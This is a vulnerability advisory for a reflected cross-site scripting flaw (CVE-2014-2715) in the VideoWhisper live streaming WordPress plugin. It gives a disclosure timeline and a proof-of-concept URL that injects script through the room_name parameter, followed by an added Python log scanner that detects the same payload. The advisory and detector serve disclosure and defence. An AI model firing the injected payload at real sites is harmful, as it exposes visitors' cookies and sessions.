Plugin Details
Plugin Name: wp-plugin : videowhisper-live-streaming-integration
Affected Version : 4.27.2 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-2715
Identified by : Anantshri
Disclosure Timeline
- January 2, 2014 : Vendor Contacted
- January 6, 2014 : Plugin Updated
- June 12, 2014 : Public Disclosure
Technical Details
http://localhost/wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26
Vulnerable Parameter : room_name
Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833654%40videowhisper-live-streaming-integration&old=833649%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=
Note: The same vulnerability was present in a Drupal module.
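
Detection sketch for the request shown under Technical Details. This is an added example, not code from the plugin or from the original advisory; it flags access-log entries that reach vv_login.php with HTML metacharacters in room_name. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter come from the advisory; the log format is an assumption.
VULN_PATH = ("/wp-content/plugins/videowhisper-live-streaming-integration"
             "/ls/vv_login.php")
PARAM = "room_name"
MARKUP = set("<>'\"")  # characters that can break out of an HTML attribute or tag
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_room_name(log_line, max_passes=3):
    """Return the decoded room_name if it carries HTML metacharacters, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith(VULN_PATH):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        # parse_qs has decoded once; decode again to catch double-encoded input.
        for _ in range(max_passes):
            if MARKUP & set(value):
                return value
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = ((n, suspicious_room_name(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in hits if value is not None]


def _line(target):
    return f'198.51.100.7 - - [12/Jun/2014:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'


# Constructed sample log lines, not captured traffic.
SAMPLE_LOG = [
    _line(VULN_PATH + "?room_name=Lobby"),
    _line(VULN_PATH + "?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26"),
    _line(VULN_PATH + "?room_name=%253Cb%253Etest"),
    _line("/index.php?room_name=%3Cb%3E"),
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: room_name={value!r}")
```

A room name that legitimately contains an apostrophe will also be flagged, so treat hits as leads to review rather than confirmed attempts.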